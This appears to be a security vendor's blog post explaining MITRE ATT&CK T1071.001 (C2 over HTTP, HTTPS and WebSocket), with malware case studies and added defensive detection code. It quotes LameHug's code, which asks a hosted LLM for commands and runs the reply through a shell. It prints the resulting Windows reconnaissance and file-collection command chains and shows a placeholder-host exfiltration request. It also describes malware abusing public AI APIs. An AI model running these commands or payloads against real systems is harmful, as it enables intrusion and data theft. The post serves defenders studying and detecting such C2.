T1071.001 Web Protocols in MITRE ATT&CK Explained

Sıla Özeren Hacıoğlu | 9 MIN READ | March 16, 2026

What Is T1071.001 Web Protocols in MITRE ATT&CK?

T1071.001 Web Protocols is a sub-technique of T1071 Application Layer Protocols in the MITRE ATT&CK framework, listed under the Command and Control tactic. It describes adversaries carrying command-and-control traffic over web protocols such as HTTP, HTTPS, and WebSocket, so that tasking and exfiltration between a compromised system and an attacker-controlled (or attacker-abused) server look like ordinary web activity.

These protocols define the rules for exchanging data between clients and servers on the web. HTTP and HTTPS carry ordinary web browsing and API calls, with HTTPS wrapping the exchange in TLS so that its content is encrypted in transit; WebSocket upgrades an HTTP connection into a persistent, bidirectional channel for real-time communication. Because nearly every internet-facing service depends on them, they are essential to normal operations and an attractive channel for adversaries who want malicious traffic to blend in with legitimate traffic.

To read about other sub-techniques of the T1071 Application Layer Protocols technique, you can visit the related hub blog.

Adversary Use of T1071.001 Web Protocols

Attackers increasingly rely on common web protocols such as HTTP, HTTPS, and WebSocket to run their command-and-control operations. Because these protocols underpin nearly all modern internet traffic, malicious activity hidden inside them is difficult to distinguish from normal user behavior. HTTP and HTTPS let infected systems retrieve commands or exfiltrate data while appearing to make routine web requests; with HTTPS, the request and response contents are hidden from any sensor that does not perform TLS inspection, leaving only metadata such as the destination, SNI, timing, and volume. WebSocket takes this further by offering a persistent, bidirectional channel that supports continuous tasking and data transfer without the noise of repeated polling.

This shift toward blending into trusted web traffic is reflected in broader threat-intelligence trends. FortiGuard Labs' 2025 Global Threat Landscape report highlights a rise in "living-off-the-land" techniques and the growing use of encrypted, SSL-based command-and-control [1]. Together, these indicators show that adversaries are steadily moving toward web-protocol C2 to improve stealth, reduce detection opportunities, and bypass traditional perimeter defenses.

Procedure Examples Used by Adversaries in Red Report 2026

C2 Disguise: Hiding Commands within Trusted Cloud URLs

For instance, as reported in July 2025, the HazyBeacon backdoor does not communicate with an attacker-registered C2 domain at all. Instead, it sends and receives commands entirely through an AWS Lambda function URL, which operates as a standard HTTPS endpoint on Amazon-owned infrastructure [2]:

<redacted>.lambda-url.ap-southeast-1.on.aws

This has several stealth benefits:

  • The destination is an Amazon-owned domain (on.aws), so the traffic looks like legitimate AWS usage rather than a connection to an attacker-registered host
  • HTTPS encrypts the requests and responses, so the commands and payloads are not visible to sensors that do not perform TLS inspection
  • The Lambda URL behaves like any normal web server and is reached with standard methods (GET/POST)
  • No unusual ports or protocols are used; everything rides on TCP/443 alongside normal enterprise traffic

This is a textbook example of adversarial use of web protocols for covert C2.

HTTPS for Dynamic C2 Commands

Another example comes from an analysis published in December 2025 [3]. The LameHug and MalTerminal malware use HTTPS over port 443 to communicate with public LLM APIs (such as those hosted by Hugging Face and OpenAI).

The adversary's goal is to hinder static analysis: the binary contains only natural-language reconnaissance prompts rather than the commands themselves. The malware sends those prompts, which effectively serve as command-and-control instructions, inside standard HTTPS requests to the API, and the malicious Windows commands that form the actual C2 payload arrive in the corresponding HTTPS responses. Because most organizations do not inspect encrypted traffic destined for reputable cloud services, this activity typically passes through firewalls and proxies without scrutiny.

Disclaimer: LameHug and MalTerminal should not be classified as LLM-based AI malware. Their design amounts to hardcoded command execution mediated through an external service, which introduces unnecessary latency, external dependencies, and multiple failure modes. Reliance on third-party APIs creates opportunities for defender disruption (the API endpoint can be blocked at the proxy and the account revoked by the provider), increases observable network activity, and introduces risks such as inconsistent responses and delayed execution. Rather than enhancing operational capability, this approach degrades reliability and operational security. A conventional, locally implemented command structure would have been more efficient, which suggests the use of AI in this context is largely superficial rather than functionally justified.

The LameHug malware uses the following Python function to construct and send the API call, requesting Windows shell commands from the hosted LLM (Qwen/Qwen2.5-Coder-32B-Instruct). The query_text() helper that performs the HTTPS request is part of the sample and is not reproduced here:

```python
import subprocess

def LLM_QUERY_EX():
    # The request body sent to the inference API. Only this prompt is stored in
    # the binary; the commands it yields never appear as strings in the sample.
    prompt = {
        'messages': [
            {
                'role': 'Windows systems administrator',
                'content': 'Make a list of commands to create folder C:\\Programdata\\info and to gather computer information, hardware information, process and services information, networks information, AD domain information, to execute in one line and add each result to text file c:\\Programdata\\info\\info.txt. Return only commands, without markdown'
            }],
        'temperature': 0.1,
        'top_p': 0.1,
        'model': 'Qwen/Qwen2.5-Coder-32B-Instruct' }
    # query_text() is the sample's own HTTPS helper (not shown): it POSTs the
    # prompt to the API over TCP/443 and returns the model's text reply.
    llm_query = query_text(prompt)
    # The reply is passed verbatim to cmd.exe via shell=True, so whatever the
    # model returns is executed on the host.
    theproc = subprocess.run(llm_query, shell = True, stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
    # ... (second prompt/command follows)
```

The LLM's HTTPS response delivers the actual malicious payload as a single line of chained commands, which the sample then executes on the compromised host (llm_query1 and llm_query2 below):

```bat
llm_query1: mkdir C:\Programdata\info && systeminfo >> C:\Programdata\info\info.txt && wmic computersystem get name,domain >> C:\Programdata\info\info.txt && wmic cpu get name,speed >> C:\Programdata\info\info.txt && wmic memorychip get capacity,speed >> C:\Programdata\info\info.txt && wmic diskdrive get model,size >> C:\Programdata\info\info.txt && wmic nic get name,macaddress,ipaddress >> C:\Programdata\info\info.txt && tasklist >> C:\Programdata\info\info.txt && net start >> C:\Programdata\info\info.txt && whoami /user >> C:\Programdata\info\info.txt && dsquery user -samid %username% >> C:\Programdata\info\info.txt && dsquery computer -samid %COMPUTERNAME% >> C:\Programdata\info\info.txt && dsquery group >> C:\Programdata\info\info.txt && dsquery ou >> C:\Programdata\info\info.txt && dsquery site >> C:\Programdata\info\info.txt && dsquery subnet >> C:\Programdata\info\info.txt && dsquery server >> C:\Programdata\info\info.txt && dsquery domain >> C:\Programdata\info\info.txt

llm_query2: xcopy "C:\Users\%username%\Documents\*.doc*" "C:\ProgramData\info\" /S /I & xcopy "C:\Users\%username%\Documents\*.pdf" "C:\ProgramData\info\" /S /I & xcopy "C:\Users\%username%\Documents\*.txt" "C:\ProgramData\info\" /S /I & xcopy "C:\Users\%username%\Downloads\*.doc*" "C:\ProgramData\info\" /S /I & xcopy "C:\Users\%username%\Downloads\*.pdf" "C:\ProgramData\info\" /S /I & xcopy "C:\Users\%username%\Downloads\*.txt" "C:\ProgramData\info\" /S /I & xcopy "C:\Users\%username%\Desktop\*.doc*" "C:\ProgramData\info\" /S /I & xcopy "C:\Users\%username%\Desktop\*.pdf" "C:\ProgramData\info\" /S /I & xcopy "C:\Users\%username%\Desktop\*.txt" "C:\ProgramData\info\" /S /I
```
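Both the HazyBeacon (Lambda URL) and the LameHug/MalTerminal (LLM API) cases share one defensive angle: the destination is a legitimate cloud service, so the destination alone is not an indicator, but the combination of that destination with an initiating process that has no business reaching it is. The following Python is an added example written for this post, not code from either malware sample or from the cited reports. It runs a simple triage over constructed proxy/EDR-style records; the Lambda function-URL shape is taken from the HazyBeacon report, while the two API hostnames and the allowlist of expected processes are assumptions to be tuned per environment.

```python
import re
from collections import Counter

# Constructed proxy/EDR-style records, not real telemetry. Each record names the
# initiating process and the destination host of one HTTPS request.
SAMPLE_RECORDS = [
    {"host": "WS01", "process": "chrome.exe",        "dest": "www.example.com"},
    {"host": "WS01", "process": "svchost.exe",       "dest": "abcd1234efgh.lambda-url.ap-southeast-1.on.aws"},
    {"host": "WS02", "process": "update_helper.exe", "dest": "api-inference.huggingface.co"},
    {"host": "WS03", "process": "code.exe",          "dest": "api.openai.com"},
    {"host": "WS02", "process": "outlook.exe",       "dest": "outlook.office365.com"},
    {"host": "WS04", "process": "svchost.exe",       "dest": "abcd1234efgh.lambda-url.ap-southeast-1.on.aws"},
]

# Destination classes abused as C2 relays in the examples above. The Lambda
# function-URL pattern follows the HazyBeacon report; the two API hostnames are
# assumptions taken from the providers' public API documentation.
ABUSED_CLOUD_ENDPOINTS = {
    "aws_lambda_url": re.compile(r"^[a-z0-9]+\.lambda-url\.[a-z0-9-]+\.on\.aws$", re.I),
    "huggingface_inference": re.compile(r"^api-inference\.huggingface\.co$", re.I),
    "openai_api": re.compile(r"^api\.openai\.com$", re.I),
}

# Processes for which contacting those endpoints is plausible (browsers and
# developer tooling). This allowlist is an assumption; tune it per environment.
EXPECTED_PROCESSES = {
    "chrome.exe", "msedge.exe", "firefox.exe",
    "code.exe", "python.exe", "node.exe", "curl.exe", "aws.exe",
}


def classify_destination(dest: str):
    """Return the abused-endpoint class for a hostname, or None if it is not one."""
    for label, pattern in ABUSED_CLOUD_ENDPOINTS.items():
        if pattern.match(dest):
            return label
    return None


def find_suspicious(records, expected=EXPECTED_PROCESSES):
    """Flag requests to abused cloud endpoints from processes that should not make them.

    The destination alone is not enough: the same hostnames serve legitimate
    workloads, so the initiating process is what turns a match into a finding.
    """
    findings = []
    for rec in records:
        label = classify_destination(rec["dest"])
        if label is None:
            continue
        if rec["process"].lower() in expected:
            continue
        findings.append({**rec, "class": label})
    return findings


def summarize(findings):
    """Count findings per endpoint class, e.g. to spot one Lambda URL reused fleet-wide."""
    return Counter(f["class"] for f in findings)


if __name__ == "__main__":
    hits = find_suspicious(SAMPLE_RECORDS)
    for h in hits:
        print(f"{h['host']}: {h['process']} -> {h['dest']} [{h['class']}]")
    print(summarize(hits))
```

On the constructed records this flags the two svchost.exe sessions to the same Lambda URL and the unknown helper talking to the inference API, while leaving the developer's VS Code session to api.openai.com alone. The same destination reused across several hosts is worth a second look even when TLS hides the content.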

Procedure Examples Used by Adversaries in Red Report 2025

For instance, as reported in November 2024, the WezRat malware establishes its command and control (C2) communication over HTTPS as part of its infection chain. After a phishing email lures the victim to a lookalike site (il-cert[.]net), they are prompted to download a fake Google Chrome Installer.msi. This MSI file not only runs a legitimate Chrome installer but also drops and executes a malicious backdoor, Updater.exe, passing the C2 server and port as arguments [4]:

"C:\Program Files (x86)\Google\Update\Updater.exe" connect.il-cert.net 8765

The backdoor uses HTTPS to communicate with the C2 server at connect.il-cert[.]net, sending system information, receiving commands, and exfiltrating stolen data. Because the channel is encrypted, security tools that rely on inspecting plain network traffic cannot see the commands or the stolen data, and the session looks like ordinary web traffic. Note, however, that the hardcoded port (8765) is not a standard HTTPS port; TLS sessions to a lookalike domain on a non-standard port are themselves a detection opportunity in firewall and proxy logs, even without decrypting the content.

In the case of Glutton malware, discovered in December 2024, HTTP is central to its modular attack framework [5]. The malware periodically polls a C2 server using standard HTTP GET or POST requests to fetch updated commands or additional payloads. Once downloaded, these payloads are executed to enable file operations, collect system information, or inject code into frameworks like Laravel and ThinkPHP.

Notably, Glutton does not encrypt its C2 traffic, relying on clear-text HTTP to deliver task instructions and new modules. The malware mimics legitimate web traffic by embedding commands within HTTP headers or responses and using periodic polling to avoid detection.

For example, in the following illustrative HTTP POST request (c2.example.com is a placeholder, not a real C2 host), the malware exfiltrates collected data, such as stolen files or credentials, to the C2 server:

```http
POST /data/upload HTTP/1.1
Host: c2.example.com
Content-Type: application/json
Content-Length: 57

{"system":"hostname","data":"base64-encoded information"}
```

In response, the C2 server can deliver commands to the malware, such as:

```json
{"command":"exec","payload":"ls -al"}
```

This demonstrates HTTP's technical versatility for enabling discreet, modular, and persistent C2 operations.
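Because Glutton's channel is clear-text, a network sensor can reconstruct the whole exchange rather than just its metadata. The following Python is an added example written for this post, not code from the Glutton analysis: it builds a request in the shape shown above with a correct Content-Length, then parses it back, verifies the declared length against the bytes actually present, decodes the base64 data field, and extracts the command from the server's JSON reply. The collected data and the host c2.example.com are constructed placeholders.

```python
import base64
import binascii
import json

# Constructed sample data, not captured traffic. c2.example.com is the
# placeholder host used in the request above.
COLLECTED = b"hostname=web01\nuid=33(www-data)\n"
SAMPLE_UPLOAD = {"system": "web01", "data": base64.b64encode(COLLECTED).decode()}
SAMPLE_TASK = b'{"command":"exec","payload":"ls -al"}'


def build_upload_request(host: str, path: str, payload: dict) -> bytes:
    """Serialize a JSON upload as an HTTP/1.1 POST whose Content-Length matches the body."""
    body = json.dumps(payload, separators=(",", ":")).encode()
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/json\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    )
    return head.encode() + body


def parse_http_message(raw: bytes):
    """Split a raw HTTP/1.1 message into (start line, headers, body).

    Content-Length is checked against the bytes actually present; a mismatch
    is how truncated captures and smuggling attempts show up, so it is an error.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "content-length" in headers:
        declared = int(headers["content-length"])
        if declared != len(body):
            raise ValueError(f"Content-Length {declared} != body {len(body)}")
    return lines[0], headers, body


def inspect_upload(raw: bytes) -> dict:
    """Recover what a clear-text upload is exfiltrating: host, path and decoded data."""
    start, headers, body = parse_http_message(raw)
    method, path, _ = start.split(" ", 2)
    doc = json.loads(body)
    try:
        decoded = base64.b64decode(doc["data"], validate=True)
    except (binascii.Error, KeyError):
        decoded = None  # field missing or not valid base64
    return {"method": method, "host": headers.get("host"), "path": path,
            "system": doc.get("system"), "decoded": decoded}


def parse_task(body: bytes):
    """Extract (command, payload) from the server's JSON tasking reply."""
    doc = json.loads(body)
    return doc["command"], doc["payload"]


if __name__ == "__main__":
    raw = build_upload_request("c2.example.com", "/data/upload", SAMPLE_UPLOAD)
    print(raw.decode())
    print(inspect_upload(raw))
    print(parse_task(SAMPLE_TASK))
```

The Content-Length check matters for a detector as much as for a server: a sensor that trusts the declared length can be fed a body it never parses, and a sensor that ignores it will misalign on the next message in a keep-alive stream.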

In another case, between August and October 2024, the RevC2 backdoor was identified using WebSocket, a protocol that runs over HTTP/S, for its C2 communication [6]. At a technical level, WebSocket is an upgrade of an ordinary HTTP connection that allows full-duplex, real-time communication between the malware (acting as a client) and the C2 server. The connection begins with an HTTP handshake: the malware sends an HTTP GET request to the C2 server carrying Upgrade: websocket and Connection: Upgrade headers together with a random Sec-WebSocket-Key, signaling its intention to establish a WebSocket connection. Once the server responds with a 101 Switching Protocols status and a matching Sec-WebSocket-Accept header, the connection leaves HTTP behind and carries WebSocket frames in both directions, without repeatedly establishing new HTTP connections.

WebSocket's nature gives RevC2 a significant advantage for stealth and efficiency. Unlike conventional HTTP, where each command requires a separate request and response, WebSocket maintains a persistent connection, allowing the malware to send and receive data over a single channel. This avoids the periodic polling that beaconing detections key on. Additionally, WebSocket traffic is hard to tell apart from legitimate web traffic in many environments because it uses the same ports as HTTP (port 80) or HTTPS (port 443) and is commonly wrapped in WebSocket Secure (WSS), i.e. TLS. Over plain HTTP the Upgrade handshake is visible and easy to match, but over WSS both the handshake and the frames are inside the TLS session, so deep-packet inspection tools that do not terminate TLS see only a long-lived HTTPS connection.
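The handshake described above, with both sides' messages, as an added example written for this post rather than code from RevC2 or from the cited analysis. It builds the client's Upgrade request, derives the server's Sec-WebSocket-Accept value the way RFC 6455 specifies (base64 of SHA-1 over the client key and a fixed GUID), validates the 101 reply on the client side, and includes a small check a sensor can run on clear-text HTTP to spot upgrade attempts. The host c2.example.com and the path /ws are placeholders.

```python
import base64
import hashlib
import os

# Fixed by RFC 6455; the server appends it to the client key before hashing.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


def compute_accept(client_key: str) -> str:
    """Sec-WebSocket-Accept = base64(SHA-1(key + GUID)), RFC 6455 section 4.2.2."""
    digest = hashlib.sha1((client_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def client_upgrade_request(host: str, path: str, key=None):
    """Build the HTTP request that asks the server to switch to WebSocket.

    Returns (raw request bytes, key) so the caller can verify the server's reply.
    The key is 16 random bytes, base64-encoded, as the RFC requires.
    """
    key = key or base64.b64encode(os.urandom(16)).decode("ascii")
    req = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Key: {key}\r\n"
        "Sec-WebSocket-Version: 13\r\n"
        "\r\n"
    )
    return req.encode("ascii"), key


def _headers(raw: bytes) -> dict:
    """Lower-cased header map from a raw request or response (start line skipped)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    out = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        out[name.strip().lower()] = value.strip()
    return out


def is_websocket_upgrade(raw_request: bytes) -> bool:
    """Detection helper: does this plain-HTTP request try to open a WebSocket?

    This only works on traffic visible in the clear (port 80, or after TLS
    interception); over WSS the Upgrade headers are inside the TLS session.
    """
    h = _headers(raw_request)
    return ("websocket" in h.get("upgrade", "").lower()
            and "upgrade" in h.get("connection", "").lower()
            and "sec-websocket-key" in h)


def server_switch_response(raw_request: bytes) -> bytes:
    """Server side: answer a valid Upgrade request with 101 Switching Protocols."""
    if not is_websocket_upgrade(raw_request):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    key = _headers(raw_request)["sec-websocket-key"]
    resp = (
        "HTTP/1.1 101 Switching Protocols\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Accept: {compute_accept(key)}\r\n"
        "\r\n"
    )
    return resp.encode("ascii")


def client_verify_switch(raw_response: bytes, key: str) -> bool:
    """Client side: accept the upgrade only on a 101 whose Accept matches our key."""
    status = raw_response.split(b"\r\n", 1)[0]
    h = _headers(raw_response)
    return status.startswith(b"HTTP/1.1 101") and h.get("sec-websocket-accept") == compute_accept(key)


if __name__ == "__main__":
    req, key = client_upgrade_request("c2.example.com", "/ws")  # placeholder host/path
    resp = server_switch_response(req)
    print(req.decode(), resp.decode(), sep="")
    print("upgrade seen by sensor:", is_websocket_upgrade(req))
    print("client accepted switch:", client_verify_switch(resp, key))
```

After the 101, everything on the socket is WebSocket framing rather than HTTP, which is why proxies that only understand request/response pairs lose visibility at exactly this point; a sensor that wants to keep following the session has to switch parsers, or log the upgrade and treat the long-lived connection as its own signal.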

References

[1] FortiGuard Labs, "2025 Global Threat Landscape Report," Fortinet. Available: https://www.fortinet.com/content/dam/fortinet/assets/threat-reports/threat-landscape-report-2025.pdf. [Accessed: Dec. 08, 2025]

[2] L. Rochberger, “Behind the Clouds: Attackers Targeting Governments in Southeast Asia Implement Novel Covert C2 Communication,” Unit 42, Jul. 14, 2025. Available: https://unit42.paloaltonetworks.com/windows-backdoor-for-novel-c2-communication/. [Accessed: Dec. 08, 2025]

[3] Picus Labs, "Malicious AI Exposed: WormGPT, MalTerminal, and LameHug," Dec. 06, 2025. Available: https://www.picussecurity.com/resource/blog/malicious-ai-exposed-wormgpt-malterminal-and-lamehug. [Accessed: Dec. 08, 2025]

[4] “Malware Spotlight: A Deep-Dive Analysis of WezRat,” Check Point Research, Nov. 14, 2024. Available: https://research.checkpoint.com/2024/wezrat-malware-deep-dive/. [Accessed: Dec. 17, 2024]

[5] The Hacker News, “New Glutton Malware Exploits Popular PHP Frameworks Like Laravel and ThinkPHP,” The Hacker News, Dec. 16, 2024. Available: https://thehackernews.com/2024/12/new-glutton-malware-exploits-popular.html. [Accessed: Dec. 17, 2024]

[6] I. V. A. Muhammed, “Unveiling RevC2 and Venom Loader,” Dec. 02, 2024. Available: https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader. [Accessed: Dec. 17, 2024]
